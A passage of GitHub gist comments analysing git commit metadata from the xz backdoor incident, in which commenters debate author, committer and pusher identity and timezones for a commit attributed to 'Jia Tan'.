EDIT: xry111 rightly points out in https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007558#gistcomment-5007558 that the pusher may be a third person and this isn't represented in git metadata.

@ItzSwirlz

@x1done daylight savings?

@xry111

xry111 commented Apr 1, 2024

@x1done But doesn't this match Lasse's TZ (for half the year or w/e)? The point being it looks like Lasse pushed it (author vs committer).

Both the author and the committer are Jia Tan:

$ git show 3d1fdddf92321b516d55651888b9c669e254634e --format=fuller | head
commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <jiat0218@gmail.com>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <jiat0218@gmail.com>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

    Docs: Document the configure option --disable-ifunc in INSTALL.

diff --git a/INSTALL b/INSTALL
index 7fb41fa6..b64c56c5 100644

But the person who pushed this commit need be neither the author nor the committer. (I.e. it may happen that A authored the change, B committed the change, and C pushed the change.)

It's not possible to find the person who pushed the commit with the git CLI. AFAIK there is some GitHub API to figure out when and who pushed a commit. However, the repo is under suspension, and even if it weren't, I still don't know if this approach would work when the GitHub repo is only a mirror.
